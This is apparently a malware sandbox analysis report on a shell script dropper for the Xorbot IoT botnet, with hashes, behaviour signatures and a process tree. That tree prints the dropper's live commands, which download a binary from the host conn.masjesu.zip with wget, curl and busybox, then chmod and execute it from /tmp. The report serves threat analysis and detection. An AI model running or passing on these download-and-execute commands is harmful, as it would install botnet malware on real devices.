Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

3

bins.sh

debian-9-armhf

4

bins.sh

debian-9-mips

3

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    134s
  • max time network
    143s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240729-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    01-12-2024 08:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    ad544eb0c3f8ca92e0175cde763a391e

  • SHA1

    ad38b1fbea994d47a961a7e6f5e825b4ff6d819b

  • SHA256

    3a40eb65eda7eeffc2b4505a83b24bfe0a9e6af0fea04cc17f2f6ef628368304

  • SHA512

    0a53adf43bbe8fe7c87920f2fd946db9d4deaadcfefc88c08de48200e262a50de9970c324067ef3bb7fb7cc5881f4068ad794a93eb360dd8f633f9f333e8cc22

  • SSDEEP

    96:YSqdz7LHbILcC8mc1RJxmWrFlkqo10C1km10Xy6/xoPjAL5RoS3G323yLKC3ZxaE:Uz7Iwtx8q97r1hAuezBtx8qD7r1X

Score
10/10
xorbotbotnetdefense_evasiondiscoverytrojan

Malware Config

Signatures

  • Detects Xorbot 1 IoCs
    botnettrojan
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

    botnettrojanxorbot
  • Xorbot family
    xorbot
  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 1 IoCs
  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:711
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:714
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/zmMTGX3JHQeNyVaiyYg1WK6zxSoQpnBSKe
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:717
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/zmMTGX3JHQeNyVaiyYg1WK6zxSoQpnBSKe
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:738
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/zmMTGX3JHQeNyVaiyYg1WK6zxSoQpnBSKe
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:819
        • /bin/chmod
          chmod 777 zmMTGX3JHQeNyVaiyYg1WK6zxSoQpnBSKe
          2⤵
          • File and Directory Permissions Modification
          PID:820
        • /tmp/zmMTGX3JHQeNyVaiyYg1WK6zxSoQpnBSKe
          ./zmMTGX3JHQeNyVaiyYg1WK6zxSoQpnBSKe
          2⤵
          • Executes dropped EXE
          PID:821
        • /bin/rm
          rm zmMTGX3JHQeNyVaiyYg1WK6zxSoQpnBSKe
          2⤵
            PID:823
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/QM6hBpmzE4B7hFoaikv0S74sJ3OUlYqkGc
            2⤵
            • System Network Configuration Discovery
            PID:824

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/zmMTGX3JHQeNyVaiyYg1WK6zxSoQpnBSKe
          Filesize

          119KB

          MD5

          1b166b95f9cb4b079ef1b9ec8363ddf3

          SHA1

          0d8eb08add467b3b5474f9b25909297fe7c2839c

          SHA256

          94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9

          SHA512

          983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

          Download Submit